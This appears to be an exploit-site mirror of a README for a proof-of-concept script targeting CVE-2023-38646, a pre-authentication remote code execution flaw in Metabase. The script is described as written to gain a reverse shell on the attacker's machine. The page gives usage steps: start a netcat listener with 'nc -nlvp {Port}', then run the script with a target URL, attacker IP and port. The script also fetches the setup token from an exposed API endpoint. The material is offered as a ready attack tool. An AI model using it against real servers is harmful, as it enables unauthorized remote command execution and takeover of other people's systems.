Share
## https://sploitus.com/exploit?id=697904A0-BACB-59FE-9418-03A10C687D56
# Metabase Pre-Auth RCE POC - CVE-2023-38646
Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server. I have written the script directly to gain reverse shell on the attacker's machine.

## Usage
The script require the Target URL, Attackers IP and Port. Providing the setup token is not required for this exploit as the script tries to obtain it from `/api/session/properties`.

Make sure to start netcat listener on Attacker machine, using the following command : 
`nc -nlvp {Port}`

Run the POC Script with:
- -u  - Target URL (Metabase)
- -ip  - Attacker IP
- -p  - Port Number  
```python
python3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>
```
 
 
 
![POC](https://i.imgur.com/BE7nuAml.png)

## References
- https://github.com/m3m0o/metabase-pre-auth-rce-poc/
- https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/